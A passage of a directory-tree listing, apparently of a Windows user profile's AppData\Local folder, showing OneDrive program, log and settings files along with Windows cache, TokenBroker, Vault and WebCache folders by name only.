│   │       │   │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   │   └── qtquicktemplates2plugin.dll
│   │       │   │   │   │   │   │   │   └── Window.2
│   │       │   │   │   │   │   │   │       ├── plugins.qmltypes
│   │       │   │   │   │   │   │   │       ├── qmldir
│   │       │   │   │   │   │   │   │       └── windowplugin.dll
│   │       │   │   │   │   │   │   └── QtQuick.2
│   │       │   │   │   │   │   │       ├── plugins.qmltypes
│   │       │   │   │   │   │   │       ├── qmldir
│   │       │   │   │   │   │   │       └── qtquick2plugin.dll
│   │       │   │   │   │   │   ├── Qt5Core.dll
│   │       │   │   │   │   │   ├── Qt5DBus.dll
│   │       │   │   │   │   │   ├── Qt5Gui.dll
│   │       │   │   │   │   │   ├── Qt5Network.dll
│   │       │   │   │   │   │   ├── Qt5PrintSupport.dll
│   │       │   │   │   │   │   ├── Qt5Qml.dll
│   │       │   │   │   │   │   ├── Qt5QmlModels.dll
│   │       │   │   │   │   │   ├── Qt5QmlWorkerScript.dll
│   │       │   │   │   │   │   ├── Qt5QuickControls2.dll
│   │       │   │   │   │   │   ├── Qt5Quick.dll
│   │       │   │   │   │   │   ├── Qt5QuickTemplates2.dll
│   │       │   │   │   │   │   ├── Qt5Svg.dll
│   │       │   │   │   │   │   ├── Qt5Widgets.dll
│   │       │   │   │   │   │   ├── Qt5WinExtras.dll
│   │       │   │   │   │   │   ├── quc
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── QuotaCritical_default.png
│   │       │   │   │   │   │   ├── QuotaCritical_Win11.png
│   │       │   │   │   │   │   ├── QuotaError.png
│   │       │   │   │   │   │   ├── QuotaFull_default.png
│   │       │   │   │   │   │   ├── QuotaFull_Win11.png
│   │       │   │   │   │   │   ├── QuotaNearing.png
│   │       │   │   │   │   │   ├── QuotaOverLimit_default.png
│   │       │   │   │   │   │   ├── quotawarning_dark.png
│   │       │   │   │   │   │   ├── quotawarning_light.png
│   │       │   │   │   │   │   ├── quz-PE
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ReactNativePicker.dll
│   │       │   │   │   │   │   ├── resources.pri
│   │       │   │   │   │   │   ├── RNSVG.dll
│   │       │   │   │   │   │   ├── ro
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ru
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── rw
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ScreenshotOptIn.gif
│   │       │   │   │   │   │   ├── sk
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── sl
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── sourcemaps
│   │       │   │   │   │   │   │   └── react
│   │       │   │   │   │   │   │       └── index.windows.bundle.map
│   │       │   │   │   │   │   ├── SparsePackage
│   │       │   │   │   │   │   │   └── OneDriveSync.msix
│   │       │   │   │   │   │   ├── sq
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── sr-Cyrl-BA
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── sr-Cyrl-RS
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── sr-Latn-RS
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── sv
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── SyncEngine.dll
│   │       │   │   │   │   │   ├── ta
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── te
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── Telemetry.dll
│   │       │   │   │   │   │   ├── TestSharePage.html
│   │       │   │   │   │   │   ├── tg
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── th
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ThirdPartyNotices.txt
│   │       │   │   │   │   │   ├── ti
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── tn-ZA
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ToastInfoIcon.png
│   │       │   │   │   │   │   ├── tr
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── tryforfree_dark.png
│   │       │   │   │   │   │   ├── tryforfree_light.png
│   │       │   │   │   │   │   ├── tt
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── tzdata
│   │       │   │   │   │   │   │   ├── africa
│   │       │   │   │   │   │   │   ├── antarctica
│   │       │   │   │   │   │   │   ├── asia
│   │       │   │   │   │   │   │   ├── australasia
│   │       │   │   │   │   │   │   ├── backward
│   │       │   │   │   │   │   │   ├── etcetera
│   │       │   │   │   │   │   │   ├── europe
│   │       │   │   │   │   │   │   ├── leapseconds
│   │       │   │   │   │   │   │   ├── northamerica
│   │       │   │   │   │   │   │   ├── southamerica
│   │       │   │   │   │   │   │   ├── version
│   │       │   │   │   │   │   │   └── windowsZones.xml
│   │       │   │   │   │   │   ├── ucrtbase.dll
│   │       │   │   │   │   │   ├── ug
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── uk
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── UpdateRingSettings.dll
│   │       │   │   │   │   │   ├── ur
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── vcamp140_app.dll
│   │       │   │   │   │   │   ├── vccorlib140_app.dll
│   │       │   │   │   │   │   ├── vcomp140_app.dll
│   │       │   │   │   │   │   ├── vcruntime140_1_app.dll
│   │       │   │   │   │   │   ├── vcruntime140_1.dll
│   │       │   │   │   │   │   ├── vcruntime140_app.dll
│   │       │   │   │   │   │   ├── vcruntime140.dll
│   │       │   │   │   │   │   ├── vi
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── Warning.png
│   │       │   │   │   │   │   ├── WebView2Loader.dll
│   │       │   │   │   │   │   ├── WnsClientApi.dll
│   │       │   │   │   │   │   ├── wo
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── xh-ZA
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── yo-NG
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── zh-CN
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── zh-TW
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   └── zlib1.dll
│   │       │   │   │   │   ├── ListSync
│   │       │   │   │   │   │   ├── Business1
│   │       │   │   │   │   │   │   └── settings
│   │       │   │   │   │   │   │       ├── Microsoft.CDN.db
│   │       │   │   │   │   │   │       ├── Microsoft.FilesOnDemand.db
│   │       │   │   │   │   │   │       ├── Microsoft.FileUsageSync.db
│   │       │   │   │   │   │   │       ├── Microsoft.ListSync.db
│   │       │   │   │   │   │   │       └── Microsoft.ListSync.Settings.db
│   │       │   │   │   │   │   ├── Common
│   │       │   │   │   │   │   │   └── settings
│   │       │   │   │   │   │   │       └── Microsoft.LocalContent.db
│   │       │   │   │   │   │   └── settings
│   │       │   │   │   │   │       └── NucleusUpdateRingConfig.json
│   │       │   │   │   │   ├── LogoImages
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-black_scale-100.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-black_scale-125.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-black_scale-150.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-black_scale-200.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-black_scale-400.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-white_scale-100.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-white_scale-125.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-white_scale-150.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-white_scale-200.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.contrast-white_scale-400.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.scale-100.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.scale-125.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.scale-150.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.scale-200.png
│   │       │   │   │   │   │   ├── OneDriveMedTile.scale-400.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-black_scale-100.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-black_scale-125.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-black_scale-150.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-black_scale-200.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-black_scale-400.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-white_scale-100.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-white_scale-125.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-white_scale-150.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-white_scale-200.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.contrast-white_scale-400.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.scale-100.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.scale-125.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.scale-150.png
│   │       │   │   │   │   │   ├── OneDriveSmallTile.scale-200.png
│   │       │   │   │   │   │   └── OneDriveSmallTile.scale-400.png
│   │       │   │   │   │   ├── logs
│   │       │   │   │   │   │   ├── Common
│   │       │   │   │   │   │   │   ├── DeviceHealthSummaryConfiguration.ini
│   │       │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1656.8780.1.odl
│   │       │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1656.8780.2.odl
│   │       │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1734.9624.1.odl
│   │       │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1734.9624.2.odl
│   │       │   │   │   │   │   │   ├── FileSyncConfig-2025-08-20.1655.8044.1.odl
│   │       │   │   │   │   │   │   ├── general.keystore
│   │       │   │   │   │   │   │   ├── StandaloneUpdater-2025-08-20.1654.7556.1.odl
│   │       │   │   │   │   │   │   ├── StandaloneUpdater-2025-08-20.1654.7564.1.odl
│   │       │   │   │   │   │   │   └── telemetry-dll-ramp-value.txt
│   │       │   │   │   │   │   ├── ListSync
│   │       │   │   │   │   │   │   ├── Business1
│   │       │   │   │   │   │   │   │   ├── DeviceHealthSummaryConfiguration.ini
│   │       │   │   │   │   │   │   │   ├── general.keystore
│   │       │   │   │   │   │   │   │   ├── microsoftNucleusTelemetryCache.otc
│   │       │   │   │   │   │   │   │   ├── Nucleus-2025-08-20.1654.7240.1.odlgz
│   │       │   │   │   │   │   │   │   ├── Nucleus-2025-08-20.1655.8636.1.odlgz
│   │       │   │   │   │   │   │   │   ├── Nucleus-2025-08-20.1656.8636.2.aodl
│   │       │   │   │   │   │   │   │   └── telemetry-dll-ramp-value.txt
│   │       │   │   │   │   │   │   └── Local
│   │       │   │   │   │   │   │       ├── general.keystore
│   │       │   │   │   │   │   │       └── NucleusLocal-2025-08-20.1655.8636.1.aodl
│   │       │   │   │   │   │   └── Personal
│   │       │   │   │   │   │       ├── DeviceHealth.json
│   │       │   │   │   │   │       ├── DeviceHealthSummaryConfiguration.ini
│   │       │   │   │   │   │       ├── FeedbackHub
│   │       │   │   │   │   │       │   └── SubmissionPayload.json
│   │       │   │   │   │   │       ├── FileCoAuth-2025-08-20.1656.8780.1.odlgz
│   │       │   │   │   │   │       ├── FileCoAuth-2025-08-20.1656.8780.2.odlgz
│   │       │   │   │   │   │       ├── FileCoAuth-2025-08-20.1734.9624.1.odlgz
│   │       │   │   │   │   │       ├── FileCoAuth-2025-08-20.1734.9624.2.odlgz
│   │       │   │   │   │   │       ├── FileSyncConfig-2025-08-20.1655.8044.1.odlgz
│   │       │   │   │   │   │       ├── general.keystore
│   │       │   │   │   │   │       ├── Install_2025-08-15_212507_25e4-12a0.loggz
│   │       │   │   │   │   │       ├── Install_2025-08-15_212525_9808-9804.loggz
│   │       │   │   │   │   │       ├── Install-2025-08-15.2125.9700.1.odlgz
│   │       │   │   │   │   │       ├── Install-2025-08-15.2125.9808.1.odlgz
│   │       │   │   │   │   │       ├── Install_2025-08-20_165044_4816-1360.loggz
│   │       │   │   │   │   │       ├── Install-2025-08-20.1650.4816.1.odlgz
│   │       │   │   │   │   │       ├── Install_2025-08-20_165505_7240-7360.loggz
│   │       │   │   │   │   │       ├── Install-PerUser_2025-08-15_212534_7420-5740.loggz
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-15.2125.6912.1.odlgz
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-15.2125.7420.1.odlgz
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-20.1650.2320.1.odlgz
│   │       │   │   │   │   │       ├── Install-PerUser_2025-08-20_165046_2320-2608.loggz
│   │       │   │   │   │   │       ├── StandaloneUpdate_2025-08-20_165434_7556-7560.loggz
│   │       │   │   │   │   │       ├── StandaloneUpdate_2025-08-20_165434_7564-7568.loggz
│   │       │   │   │   │   │       ├── StandaloneUpdater-2025-08-20.1654.7556.1.odlgz
│   │       │   │   │   │   │       ├── StandaloneUpdater-2025-08-20.1654.7564.1.odlgz
│   │       │   │   │   │   │       ├── SyncEngine-2025-08-15.2125.1252.1.odlgz
│   │       │   │   │   │   │       ├── SyncEngine-2025-08-15.2125.8296.1.odlgz
│   │       │   │   │   │   │       ├── SyncEngine-2025-08-20.1649.3016.1.odlgz
│   │       │   │   │   │   │       ├── SyncEngine-2025-08-20.1655.7272.1.odlgz
│   │       │   │   │   │   │       ├── SyncEngine-2025-08-20.1656.7272.2.odlgz
│   │       │   │   │   │   │       ├── SyncEngine-2025-08-20.1734.7588.1.odlgz
│   │       │   │   │   │   │       ├── SyncEngine-2025-08-20.1734.7588.2.aodl
│   │       │   │   │   │   │       ├── telemetryCache.otc.session
│   │       │   │   │   │   │       ├── telemetry-dll-ramp-value.txt
│   │       │   │   │   │   │       ├── TraceCurrent.0304.0013.etl
│   │       │   │   │   │   │       ├── Update_2025-08-15_212512_2068-2130.loggz
│   │       │   │   │   │   │       └── Update_2025-08-20_164947_3016-4652.loggz
│   │       │   │   │   │   ├── OneDrive.App.exe
│   │       │   │   │   │   ├── OneDrive.exe
│   │       │   │   │   │   ├── OneDriveStandaloneUpdater.exe
│   │       │   │   │   │   ├── OneDrive.VisualElementsManifest.xml
│   │       │   │   │   │   ├── Resources.pri
│   │       │   │   │   │   ├── settings
│   │       │   │   │   │   │   ├── Personal
│   │       │   │   │   │   │   │   ├── assertInformation.ini
│   │       │   │   │   │   │   │   ├── CxP.db
│   │       │   │   │   │   │   │   ├── CxP.db-shm
│   │       │   │   │   │   │   │   ├── CxP.db-wal
│   │       │   │   │   │   │   │   ├── ECSConfig.json
│   │       │   │   │   │   │   │   ├── global.ini
│   │       │   │   │   │   │   │   ├── logUploaderSettings.ini
│   │       │   │   │   │   │   │   ├── logUploaderSettings_temp.ini
│   │       │   │   │   │   │   │   ├── OCSI.db
│   │       │   │   │   │   │   │   ├── SettingsDatabase.db
│   │       │   │   │   │   │   │   ├── SettingsDatabase.db-shm
│   │       │   │   │   │   │   │   ├── SettingsDatabase.db-wal
│   │       │   │   │   │   │   │   ├── SurveyManagerState.json
│   │       │   │   │   │   │   │   └── SyncEngineDatabase.db
│   │       │   │   │   │   │   └── PreSignInSettingsConfig.json
│   │       │   │   │   │   ├── setup
│   │       │   │   │   │   │   ├── ECSConfig.json
│   │       │   │   │   │   │   └── logs
│   │       │   │   │   │   │       ├── DeviceHealthSummaryConfiguration.ini
│   │       │   │   │   │   │       ├── Install_2025-08-15_212507_25e4-12a0.log
│   │       │   │   │   │   │       ├── Install_2025-08-15_212525_9808-9804.log
│   │       │   │   │   │   │       ├── Install-2025-08-15.2125.9700.1.odl
│   │       │   │   │   │   │       ├── Install-2025-08-15.2125.9808.1.aodl
│   │       │   │   │   │   │       ├── Install-2025-08-15.2125.9808.1.odl
│   │       │   │   │   │   │       ├── Install_2025-08-20_165044_4816-1360.log
│   │       │   │   │   │   │       ├── Install-2025-08-20.1650.4816.1.aodl
│   │       │   │   │   │   │       ├── Install-2025-08-20.1650.4816.1.odl
│   │       │   │   │   │   │       ├── Install_2025-08-20_165505_7240-7360.log
│   │       │   │   │   │   │       ├── Install_2025-08-20_165559_8636-8640.log
│   │       │   │   │   │   │       ├── Install-PerUser_2025-08-15_212507_1b00-230.log
│   │       │   │   │   │   │       ├── Install-PerUser_2025-08-15_212534_7420-5740.log
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-15.2125.6912.1.aodl
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-15.2125.6912.1.odl
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-15.2125.7420.1.aodl
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-15.2125.7420.1.odl
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-20.1650.2320.1.aodl
│   │       │   │   │   │   │       ├── Install-PerUser-2025-08-20.1650.2320.1.odl
│   │       │   │   │   │   │       ├── Install-PerUser_2025-08-20_165046_2320-2608.log
│   │       │   │   │   │   │       ├── StandaloneUpdate_2025-08-20_165434_7556-7560.log
│   │       │   │   │   │   │       ├── StandaloneUpdate_2025-08-20_165434_7564-7568.log
│   │       │   │   │   │   │       ├── Update_2025-08-15_212512_2068-2130.log
│   │       │   │   │   │   │       ├── Update_2025-08-15_212545_1252-760.log
│   │       │   │   │   │   │       ├── Update_2025-08-20_164947_3016-4652.log
│   │       │   │   │   │   │       ├── Update_2025-08-20_165603_7272-7880.log
│   │       │   │   │   │   │       └── Update_2025-08-20_173431_7588-2904.log
│   │       │   │   │   │   ├── StandaloneUpdater
│   │       │   │   │   │   │   ├── ECSConfig.json
│   │       │   │   │   │   │   └── PreSignInSettingsConfig.json
│   │       │   │   │   │   └── Update
│   │       │   │   │   │       ├── OneDriveSetup.exe
│   │       │   │   │   │       └── update.xml
│   │       │   │   │   ├── PenWorkspace
│   │       │   │   │   │   └── DiscoverCacheData.dat
│   │       │   │   │   ├── TokenBroker
│   │       │   │   │   │   └── Cache
│   │       │   │   │   │       ├── 1521f696d8626c8e8127c0284ab987ff1974f39a.tbres
│   │       │   │   │   │       ├── 4e7a3602a6530194fc2a9d803f78656054f42b7e.tbres
│   │       │   │   │   │       ├── 51783692009bf8712b831eb4e8a04f24e104bd5a.tbres
│   │       │   │   │   │       ├── 5475cb191e478c39370a215b2da98a37e9dc813d.tbres
│   │       │   │   │   │       ├── 78c091ac6d34daa9d603629dd088840de549030f.tbres
│   │       │   │   │   │       └── 9381d1eda90e9d9a7244894a11dbeaceaca12311.tbres
│   │       │   │   │   ├── Vault
│   │       │   │   │   │   ├── 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
│   │       │   │   │   │   │   └── Policy.vpol
│   │       │   │   │   │   └── UserProfileRoaming
│   │       │   │   │   │       └── Latest.dat
│   │       │   │   │   ├── Windows
│   │       │   │   │   │   ├── 1033
│   │       │   │   │   │   │   └── StructuredQuerySchema.bin
│   │       │   │   │   │   ├── ActionCenterCache
│   │       │   │   │   │   │   └── windows-systemtoast-suggested_16_0
│   │       │   │   │   │   ├── AppCache
│   │       │   │   │   │   │   ├── 4W403QA7
│   │       │   │   │   │   │   │   └── container.dat
│   │       │   │   │   │   │   └── container.dat
│   │       │   │   │   │   ├── Application Shortcuts
│   │       │   │   │   │   │   └── desktop.ini
│   │       │   │   │   │   ├── Burn
│   │       │   │   │   │   │   └── Burn
│   │       │   │   │   │   │       └── desktop.ini
│   │       │   │   │   │   ├── Caches
│   │       │   │   │   │   │   ├── {31B1445D-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db
│   │       │   │   │   │   │   ├── {3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000000c.db
│   │       │   │   │   │   │   ├── {AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db
│   │       │   │   │   │   │   ├── cversions.1.db
│   │       │   │   │   │   │   └── cversions.3.db
│   │       │   │   │   │   ├── Explorer
│   │       │   │   │   │   │   ├── ExplorerStartupLog.etl
│   │       │   │   │   │   │   ├── iconcache_1280.db
│   │       │   │   │   │   │   ├── iconcache_16.db
│   │       │   │   │   │   │   ├── iconcache_1920.db
│   │       │   │   │   │   │   ├── iconcache_2560.db
│   │       │   │   │   │   │   ├── iconcache_256.db
│   │       │   │   │   │   │   ├── iconcache_32.db
│   │       │   │   │   │   │   ├── iconcache_48.db
│   │       │   │   │   │   │   ├── iconcache_768.db
│   │       │   │   │   │   │   ├── iconcache_96.db
│   │       │   │   │   │   │   ├── iconcache_custom_stream.db
│   │       │   │   │   │   │   ├── iconcache_exif.db
│   │       │   │   │   │   │   ├── iconcache_idx.db
│   │       │   │   │   │   │   ├── iconcache_sr.db
│   │       │   │   │   │   │   ├── iconcache_wide_alternate.db
│   │       │   │   │   │   │   ├── iconcache_wide.db
│   │       │   │   │   │   │   ├── thumbcache_1280.db
│   │       │   │   │   │   │   ├── thumbcache_16.db
│   │       │   │   │   │   │   ├── thumbcache_1920.db
│   │       │   │   │   │   │   ├── thumbcache_2560.db
│   │       │   │   │   │   │   ├── thumbcache_256.db
│   │       │   │   │   │   │   ├── thumbcache_32.db
│   │       │   │   │   │   │   ├── thumbcache_48.db
│   │       │   │   │   │   │   ├── thumbcache_768.db
│   │       │   │   │   │   │   ├── thumbcache_96.db
│   │       │   │   │   │   │   ├── thumbcache_custom_stream.db
│   │       │   │   │   │   │   ├── thumbcache_exif.db
│   │       │   │   │   │   │   ├── thumbcache_idx.db
│   │       │   │   │   │   │   ├── thumbcache_sr.db
│   │       │   │   │   │   │   ├── thumbcache_wide_alternate.db
│   │       │   │   │   │   │   └── thumbcache_wide.db
│   │       │   │   │   │   ├── History
│   │       │   │   │   │   │   ├── desktop.ini
│   │       │   │   │   │   │   └── History.IE5
│   │       │   │   │   │   │       ├── container.dat
│   │       │   │   │   │   │       ├── MSHist012025081120250818
│   │       │   │   │   │   │       │   └── container.dat
│   │       │   │   │   │   │       └── MSHist012025082020250821
│   │       │   │   │   │   │           └── container.dat
│   │       │   │   │   │   ├── INetCache
│   │       │   │   │   │   │   └── IE
│   │       │   │   │   │   │       ├── 4EYSJFY3
│   │       │   │   │   │   │       │   ├── 7895f72cb31f74094c5032cb5b149cca7cb7cb14[1].xml
│   │       │   │   │   │   │       │   ├── 7895f72cb31f74094c5032cb5b149cca7cb7cb14[2].xml
│   │       │   │   │   │   │       │   └── oneds-analytics-js_v2_9966a2b9a2d7598281cd[1].js
│   │       │   │   │   │   │       ├── container.dat
│   │       │   │   │   │   │       ├── HOCYMRRE
│   │       │   │   │   │   │       │   ├── 7895f72cb31f74094c5032cb5b149cca7cb7cb14[1].xml
│   │       │   │   │   │   │       │   ├── login_v2_en_1t6O2Deo9lZx_hfJgz2nvQ2[1].js
│   │       │   │   │   │   │       │   └── PreSignInSettingsConfig[1].json
│   │       │   │   │   │   │       ├── SER34BP8
│   │       │   │   │   │   │       │   ├── legacy-polyfill_FPpelzeB5wf7OuEuISCrCA2[1].js
│   │       │   │   │   │   │       │   ├── microsoft_logo_ee5c8d9fb6248c938fd0[1].svg
│   │       │   │   │   │   │       │   └── Windows[1].json
│   │       │   │   │   │   │       └── SI2SB0ME
│   │       │   │   │   │   │           ├── 21.220.1024[1].json
│   │       │   │   │   │   │           ├── fabric-chunk_vendors_3AuhqAH6urzCMdrL7EL03Q2[1].js
│   │       │   │   │   │   │           └── Windows[1].json
│   │       │   │   │   │   ├── INetCookies
│   │       │   │   │   │   │   └── ESE
│   │       │   │   │   │   │       └── container.dat
│   │       │   │   │   │   ├── Notifications
│   │       │   │   │   │   │   ├── wpndatabase.db
│   │       │   │   │   │   │   ├── wpndatabase.db-shm
│   │       │   │   │   │   │   ├── wpndatabase.db-wal
│   │       │   │   │   │   │   └── WPNPRMRY.tmp
│   │       │   │   │   │   ├── PowerShell
│   │       │   │   │   │   │   └── ModuleAnalysisCache
│   │       │   │   │   │   ├── Safety
│   │       │   │   │   │   │   ├── edge
│   │       │   │   │   │   │   │   ├── local
│   │       │   │   │   │   │   │   │   └── local
│   │       │   │   │   │   │   │   │       └── cache
│   │       │   │   │   │   │   │   └── remote
│   │       │   │   │   │   │   │       ├── script
│   │       │   │   │   │   │   │       ├── script_300161259571223429446516194326035503227.rel.v2
│   │       │   │   │   │   │   │       ├── synchronousLookupUris
│   │       │   │   │   │   │   │       ├── synchronousLookupUris_638343870221005468
│   │       │   │   │   │   │   │       ├── topTraffic
│   │       │   │   │   │   │   │       └── topTraffic_638004170464094982
│   │       │   │   │   │   │   └── shell
│   │       │   │   │   │   │       └── remote
│   │       │   │   │   │   │           ├── script
│   │       │   │   │   │   │           └── script_96032244749497702726114603847611723578.rel.v2
│   │       │   │   │   │   ├── Shell
│   │       │   │   │   │   │   └── DefaultLayouts.xml
│   │       │   │   │   │   ├── UsrClass.dat
│   │       │   │   │   │   ├── UsrClass.dat{ccfd4875-7a1d-11f0-9f88-005056b4d166}.TM.blf
│   │       │   │   │   │   ├── UsrClass.dat{ccfd4875-7a1d-11f0-9f88-005056b4d166}.TMContainer00000000000000000001.regtrans-ms
│   │       │   │   │   │   ├── UsrClass.dat{ccfd4875-7a1d-11f0-9f88-005056b4d166}.TMContainer00000000000000000002.regtrans-ms
│   │       │   │   │   │   ├── UsrClass.dat.LOG1
│   │       │   │   │   │   ├── UsrClass.dat.LOG2
│   │       │   │   │   │   ├── WebCache
│   │       │   │   │   │   │   ├── V0100005.log
│   │       │   │   │   │   │   ├── V01.chk
│   │       │   │   │   │   │   ├── V01.log
│   │       │   │   │   │   │   ├── V01res00001.jrs
│   │       │   │   │   │   │   ├── V01res00002.jrs
│   │       │   │   │   │   │   ├── V01tmp.log
│   │       │   │   │   │   │   ├── WebCacheV01.dat
│   │       │   │   │   │   │   └── WebCacheV01.jfm
│   │       │   │   │   │   ├── WebCacheLock.dat
│   │       │   │   │   │   └── WinX
│   │       │   │   │   │       ├── Group1
│   │       │   │   │   │       │   ├── 1 - Desktop.lnk
│   │       │   │   │   │       │   └── desktop.ini
│   │       │   │   │   │       ├── Group2
│   │       │   │   │   │       │   ├── 1 - Run.lnk
│   │       │   │   │   │       │   ├── 2 - Search.lnk
│   │       │   │   │   │       │   ├── 3 - Windows Explorer.lnk
│   │       │   │   │   │       │   ├── 4 - Control Panel.lnk
│   │       │   │   │   │       │   ├── 5 - Task Manager.lnk
│   │       │   │   │   │       │   └── desktop.ini
│   │       │   │   │   │       └── Group3
│   │       │   │   │   │           ├── 01a - Windows PowerShell.lnk
│   │       │   │   │   │           ├── 01 - Command Prompt.lnk
│   │       │   │   │   │           ├── 02a - Windows PowerShell.lnk
│   │       │   │   │   │           ├── 02 - Command Prompt.lnk
│   │       │   │   │   │           ├── 03 - Computer Management.lnk
│   │       │   │   │   │           ├── 04-1 - NetworkStatus.lnk
│   │       │   │   │   │           ├── 04 - Disk Management.lnk
│   │       │   │   │   │           ├── 05 - Device Manager.lnk
│   │       │   │   │   │           ├── 06 - SystemAbout.lnk
